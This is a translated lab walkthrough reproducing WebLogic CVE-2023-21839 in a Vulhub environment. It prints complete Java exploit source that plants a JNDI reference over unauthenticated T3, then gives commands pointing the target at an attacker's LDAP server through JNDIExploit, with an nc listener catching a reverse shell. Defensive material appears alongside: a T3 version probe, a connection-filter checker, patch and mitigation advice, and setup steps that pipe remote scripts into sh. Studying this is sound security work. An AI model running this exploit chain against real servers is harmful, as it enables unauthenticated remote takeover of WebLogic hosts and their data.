WebLogic CVE-2023-21839 vulnerability reproduction

WebLogic has a remote code execution vulnerability (CVE-2023-21839 / CNVD-2023-04389). Because of a flaw in WebLogic's handling of the IIOP and T3 protocols, an unauthenticated attacker with network access to a server on which IIOP or T3 is enabled can exploit it. Successful exploitation can let the attacker take over the WebLogic Server and execute arbitrary commands, crash the server, or leak sensitive data.

Severity: high

  • CNVD-2023-04389

  • CVE-2023-21839

Affected versions

The following versions are affected:

10.3.6.0
12.1.2.0.0
12.1.3.0.0
12.2.1.0.0
12.2.1.1.0
12.2.1.2.0
12.2.1.3.0
12.2.1.4.0
14.1.1.0.0

FOFA query:

app="BEA-WebLogic-Server" || app="Weblogic_interface_7001"
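The FOFA query finds WebLogic hosts, but it does not tell you whether T3 is actually served on the port or which release is running. The following script is an added example, not code from the original article or from Vulfocus: it sends the client side of the T3 handshake, parses the HELO version the server answers with, and checks that version against the affected list above. The sample replies embedded in it are constructed; the host and port given on the command line are assumptions. It probes T3 only, not IIOP, and the HELO version does not change when the Critical Patch Update is applied, so an "affected" verdict means the release line is affected, not that the patch is missing.

```python
"""Probe a WebLogic listener for the T3 protocol and check the reported
version against the affected list from this advisory."""
import re
import socket
import sys

# Affected versions copied from the advisory above.
AFFECTED_VERSIONS = {
    "10.3.6.0", "12.1.2.0.0", "12.1.3.0.0", "12.2.1.0.0", "12.2.1.1.0",
    "12.2.1.2.0", "12.2.1.3.0", "12.2.1.4.0", "14.1.1.0.0",
}

# Client side of the T3 handshake. A listener with T3 enabled answers with a
# "HELO:<version>.<true|false>" line; anything else (an HTTP error, a closed
# socket, silence) means T3 is not being served on that port.
T3_HANDSHAKE = b"t3 12.2.1\nAS:255\nHL:19\nMS:10000000\n\n"
HELO_RE = re.compile(rb"^HELO:(\d+(?:\.\d+)+)\.(?:true|false)", re.M)

# Constructed sample reply with the shape a 12.2.1.3.0 server sends back.
SAMPLE_HELO = b"HELO:12.2.1.3.0.false\nAS:2048\nHL:19\nMS:10000000\n\n"


def parse_t3_helo(response: bytes):
    """Return the version string from a T3 HELO reply, or None if the reply
    is not a T3 greeting."""
    m = HELO_RE.search(response)
    return m.group(1).decode() if m else None


def is_affected(version: str) -> bool:
    """True if the version is on the advisory's affected list. The patch does
    not change this string, so confirm the patch level separately."""
    return version in AFFECTED_VERSIONS


def assess(response: bytes) -> dict:
    """Turn a raw reply into a verdict: T3 exposed?, version, on the list?"""
    version = parse_t3_helo(response)
    return {
        "t3": version is not None,
        "version": version,
        "affected": version is not None and is_affected(version),
    }


def probe_t3(host: str, port: int = 7001, timeout: float = 5.0) -> dict:
    """Send the handshake to host:port and assess the reply (needs network)."""
    data = b""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(T3_HANDSHAKE)
        try:
            # The greeting ends with a blank line; stop there or on close.
            while b"\n\n" not in data and len(data) < 4096:
                chunk = s.recv(1024)
                if not chunk:
                    break
                data += chunk
        except socket.timeout:
            pass
    return assess(data)


if __name__ == "__main__":
    # Usage: python probe_t3.py <host> [port]   (host/port are assumptions)
    target = sys.argv[1]
    target_port = int(sys.argv[2]) if len(sys.argv) > 2 else 7001
    print(probe_t3(target, target_port))
```

Run it against the Vulhub container (port 7001) after the environment below is up; a server that closes the socket or answers with an HTTP error is reported as not serving T3.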

Vulfocus has packaged an environment for this vulnerability; the following images are available:

docker pull vulfocus/vcpe-1.0-a-oracle-weblogic:12.2.1.2.0-jdk-release
docker pull vulfocus/vcpe-1.0-a-oracle-weblogic:12.2.1.1.0-jdk-release
docker pull vulfocus/vcpe-1.0-a-oracle-weblogic:12.2.1.3.0-jdk-release
docker pull vulfocus/vcpe-1.0-a-oracle-weblogic:12.2.1.4.0-jdk-release
docker pull vulfocus/vcpe-1.0-a-oracle-weblogic:12.2.1.0.0-jdk-release
docker pull vulfocus/vcpe-1.0-a-oracle-weblogic:14.1.1.0.0-jdk-release
docker pull vulfocus/vcpe-1.0-a-oracle-weblogic:12.1.2.0.0-jdk-release
docker pull vulfocus/vcpe-1.0-a-oracle-weblogic:12.1.3.0.0-jdk-release
docker pull vulfocus/vcpe-1.0-a-oracle-weblogic:10.3.6.0-jdk-release

Vulnerability reproduction

This walkthrough deploys the Vulhub environment with Docker.

1. Install the latest version of Docker

curl -s https://get.docker.com/ | sh

Note: some Linux releases are not compatible with the latest Docker; either upgrade the kernel or install an older Docker version. To switch versions:

(1) List the stable versions available: sudo apt-cache madison docker-ce

(2) Uninstall the current docker-ce: sudo apt-get autoremove docker-ce

(3) Install a specific version: sudo apt-get install docker-ce=17.12.1~ce-0~ubuntu

2. Start the Docker service

service docker start

3. Install pip

apt-get install python-pip

4. Install docker-compose

pip install docker-compose (if the download is too slow, fetch the package elsewhere and copy it to the VM)

Note: on current Debian/Ubuntu releases the package is python3-pip, and the pip-installed docker-compose is the legacy v1 tool. The Compose plugin that ships with recent Docker works as well; use "docker compose" (no hyphen) in place of "docker-compose" in the commands below.

5. Configure a Docker registry mirror (optional; speeds up image pulls from mainland China)

curl -sSL https://get.daocloud.io/daotools/set_mirror.sh | sh -s http://f1361db2.m.daocloud.io

6. Download or clone Vulhub

git clone https://github.com/vulhub/vulhub.git (if the download is too slow, fetch the archive elsewhere and copy it to the VM)

7. Enter the Vulhub directory

cd vulhub-master/

(git clone creates a directory named vulhub; vulhub-master is what the GitHub zip download unpacks to. Use whichever you have.)

8. Enter the directory of the vulnerability environment

cd /home/vulhub1/Desktop/vulhub-master/weblogic/CVE-2023-21839

9. Build the vulnerability environment

sudo docker-compose build (some environments need a build step; this one does not, so the command can be skipped)

10. Start the vulnerability environment

docker-compose up -d

11. Check that the containers are running

docker ps

12. Access the vulnerability environment

Use the VPS public IP plus the mapped port. Each environment directory contains a README.md describing the setup and the exposed ports; view it with cat.

13. Shut down the vulnerability environment when you are done (run this in the same directory; no rebuild is needed next time)

docker-compose down

14. Visit http://127.0.0.1:7001/console/login/LoginForm.jsp. The environment is up once the WebLogic console login page loads (WebLogic takes a minute or two to start, so retry if the page is not served immediately).

Note: the goal of this reproduction is to obtain a reverse shell from the target range server (server A).

Exploitation

DNSLog detection

EXP: https://github.com/DXask88MA/Weblogic-CVE-2023-21839 (packaged as a jar)

PoC source. The exploit connects to the target over T3 without credentials, binds a weblogic.deployment.jms.ForeignOpaqueReference into the server's JNDI tree and then looks it up. On lookup the server resolves the reference itself: ForeignOpaqueReference.getReferent() performs a JNDI lookup of the remoteJNDIName field using the jndiEnvironment field, and since both are attacker-controlled the server ends up querying the attacker's ldap:// URL, a classic JNDI injection.

import javax.naming.Context;
import javax.naming.InitialContext;
import javax.naming.NamingException;
import java.lang.reflect.Field;
import java.util.Hashtable;
import java.util.Random;

// Needs the WebLogic client classes (weblogic.jndi.WLInitialContextFactory,
// weblogic.deployment.jms.ForeignOpaqueReference) on the classpath, e.g. from
// wlthint3client.jar or wlfullclient.jar. Run with Java 8.
public class CVE_2023_21839 {
    static String JNDI_FACTORY = "weblogic.jndi.WLInitialContextFactory";
    static String HOW_TO_USE = "[*] java -jar Weblogic-CVE-2023-21839.jar <target ip:port> <ldap url>\n"
            + "e.g. java -jar Weblogic-CVE-2023-21839.jar 192.168.220.129:7001 "
            + "ldap://192.168.31.58:1389/Basic/ReverseShell/192.168.220.129/1111";

    // Open a T3 JNDI context to the target; no credentials are required.
    private static InitialContext getInitialContext(String url) throws NamingException {
        Hashtable<String, String> env = new Hashtable<String, String>();
        env.put(Context.INITIAL_CONTEXT_FACTORY, JNDI_FACTORY);
        env.put(Context.PROVIDER_URL, url);
        return new InitialContext(env);
    }

    public static void main(String[] args) throws Exception {
        if (args.length < 2) {
            System.out.println(HOW_TO_USE);
            System.exit(0);
        }
        String t3Url = args[0];
        String ldapUrl = args[1];
        InitialContext c = getInitialContext("t3://" + t3Url);

        // Environment the server will use when it resolves the reference.
        Hashtable<String, String> env = new Hashtable<String, String>();
        env.put(Context.INITIAL_CONTEXT_FACTORY, "com.sun.jndi.rmi.registry.RegistryContextFactory");

        // ForeignOpaqueReference.getReferent() does a JNDI lookup of
        // remoteJNDIName with jndiEnvironment. Both fields are private, so
        // they are set by reflection; pointing remoteJNDIName at the attacker's
        // LDAP server turns the server-side lookup into a JNDI injection.
        weblogic.deployment.jms.ForeignOpaqueReference f = new weblogic.deployment.jms.ForeignOpaqueReference();
        Field jndiEnvironment = weblogic.deployment.jms.ForeignOpaqueReference.class.getDeclaredField("jndiEnvironment");
        jndiEnvironment.setAccessible(true);
        jndiEnvironment.set(f, env);
        Field remoteJNDIName = weblogic.deployment.jms.ForeignOpaqueReference.class.getDeclaredField("remoteJNDIName");
        remoteJNDIName.setAccessible(true);
        remoteJNDIName.set(f, ldapUrl);

        // Bind the reference under a random name, then look it up: the lookup
        // is what makes the server call getReferent() and contact the LDAP URL.
        // The lookup normally ends in an exception after the payload has fired,
        // which is why it is swallowed here.
        String bindName = new Random(System.currentTimeMillis()).nextLong() + "";
        try {
            c.bind(bindName, f);
            c.lookup(bindName);
        } catch (Exception e) {
        }
    }
}

(1) Run the exp from attack machine B against range server A. The exp needs a Java 1.8 runtime; here the attack machine is Kali 2021.

(2) Kali ships with JDK 11, which must be removed before installing JDK 1.8.

Reference: https://www.yuque.com/u2114382/odrch9/uhac2mnslbctxpwd

(3) Run the following on the attack machine, then refresh the DNSLog page. A DNS query for the ldap:// hostname arriving at DNSLog shows that the target resolved the attacker-supplied URL, i.e. the server-side JNDI lookup fired, without running any payload yet.

java -jar Weblogic-CVE-2023-21839.jar <target ip>:7001 ldap://kejajb.dnslog.cn

Reverse shell

(1) First start an LDAP service with the JNDIExploit-1.4-SNAPSHOT.jar tool.

Download: https://github.com/WhiteHSBG/JNDIExploit

(2) After downloading, run the jar on server C; this starts the LDAP server (and the HTTP server that serves the payload classes) that the target will be pointed at.

java -jar JNDIExploit-1.4-SNAPSHOT.jar -i <server C IP>

(3) Once it is up, start a listener for the reverse shell on server C, for example nc -lvnp <port>.

(4) Now run the exp from attack machine B. The path after the LDAP port selects JNDIExploit's ReverseShell payload and tells it where to connect back.

java -jar Weblogic-CVE-2023-21839.jar <target IP>:7001 ldap://<server C IP>:1389/Basic/ReverseShell/<server C IP>/<nc listening port>

(5) Check server C: the nc listener has received the shell from the target.

Remediation

Oracle has released a patch for this vulnerability as part of the January 2023 Critical Patch Update; the patch availability document is:

https://support.oracle.com/rs?type=doc&id=2917213.2

Mitigation: if T3 and IIOP are not needed, disable them. IIOP can be turned off per server in the administration console (Servers > server name > Protocols > IIOP, untick Enable IIOP). T3 can be restricted with a connection filter: set weblogic.security.net.ConnectionFilterImpl as the connection filter (domain > Security > Filter) and supply a rules file that denies t3 and t3s (and iiop/iiops) from untrusted sources. WLST and other management clients use T3, so allow it only from administration hosts rather than denying it everywhere. The version string a server reports does not change when the patch is applied, so check the patch level with opatch lsinventory rather than relying on the version alone.
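To check a connection filter rules file before loading it into WebLogic, the following is an added example, not code from the original article or from Oracle: it parses rules in the ConnectionFilterImpl format (target localAddress localPort action protocols) and evaluates them the way that filter does, first matching rule wins, a connection matching no rule is allowed, and a rule with no protocol list applies to every protocol. The 10.0.0.0/8 administration network, the 192.168.1.10 listener address and the 203.0.113.5 Internet client are assumptions chosen for the demonstration, and the rules files are constructed.

```python
"""Offline checker for a WebLogic connection filter rules file: parses the
rules and evaluates which protocols a given client could still open."""
import ipaddress

# Protocol names a ConnectionFilterImpl rule may list (Oracle docs).
PROTOCOLS = {"t3", "t3s", "http", "https", "ldap", "ldaps", "iiop", "iiops", "com"}
# The protocols this advisory is about.
RISKY = ("t3", "t3s", "iiop", "iiops")

# Constructed rules file for the mitigation above. One rule per line:
#   target localAddress localPort action [protocols...]
# Only the assumed administration network 10.0.0.0/8 keeps T3; every other
# source is denied T3/T3S and IIOP/IIOPS on every listener.
EXAMPLE_RULES = """
10.0.0.0/8 * * allow t3 t3s
0.0.0.0/0 * * deny t3 t3s iiop iiops
"""

# Constructed rules file that looks right but leaves T3S and IIOP open.
INCOMPLETE_RULES = "0.0.0.0/0 * * deny t3\n"


def parse_rules(text: str) -> list:
    """Parse rules; '#' starts a comment. Targets must be an IP or CIDR here
    (hostname targets, which WebLogic resolves at load time, are rejected)."""
    rules = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        parts = line.split()
        if len(parts) < 4:
            raise ValueError("malformed rule: " + raw)
        target, local_addr, local_port, action = parts[:4]
        if action not in ("allow", "deny"):
            raise ValueError("action must be allow or deny: " + raw)
        protocols = {p.lower() for p in parts[4:]}
        unknown = protocols - PROTOCOLS
        if unknown:
            raise ValueError("unknown protocol(s) %s in: %s" % (sorted(unknown), raw))
        rules.append({
            "target": ipaddress.ip_network(target, strict=False),
            "local_addr": local_addr,
            "local_port": None if local_port == "*" else int(local_port),
            "allow": action == "allow",
            "protocols": protocols,  # empty set: rule applies to all protocols
        })
    return rules


def connection_allowed(rules, remote_ip, local_addr, local_port, protocol) -> bool:
    """First matching rule wins; a connection matching no rule is accepted,
    which is why a catch-all deny must come last."""
    ip = ipaddress.ip_address(remote_ip)
    for r in rules:
        if ip not in r["target"]:
            continue
        if r["local_addr"] != "*" and r["local_addr"] != local_addr:
            continue
        if r["local_port"] is not None and r["local_port"] != local_port:
            continue
        if r["protocols"] and protocol not in r["protocols"]:
            continue
        return r["allow"]
    return True


def still_exposed(rules, remote_ip, local_addr, local_port) -> list:
    """Which of the risky protocols the given client could still open."""
    return [p for p in RISKY
            if connection_allowed(rules, remote_ip, local_addr, local_port, p)]


if __name__ == "__main__":
    import sys
    # Usage: python check_rules.py [rules-file]; defaults to EXAMPLE_RULES.
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else EXAMPLE_RULES
    parsed = parse_rules(text)
    # 203.0.113.5 (TEST-NET-3) stands in for an arbitrary Internet client.
    print("Internet client can still open:",
          still_exposed(parsed, "203.0.113.5", "192.168.1.10", 7001))
```

INCOMPLETE_RULES shows the trap: denying only t3 leaves t3s, iiop and iiops open, because an unmatched connection is allowed by default.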

Source: https://www.freebuf.com/vuls/364212.html

Statement: the techniques, ideas and tools in this article are only for security learning and exchange. They must not be used for illegal purposes or for profit; anyone who does so bears the consequences. All penetration testing requires authorization!
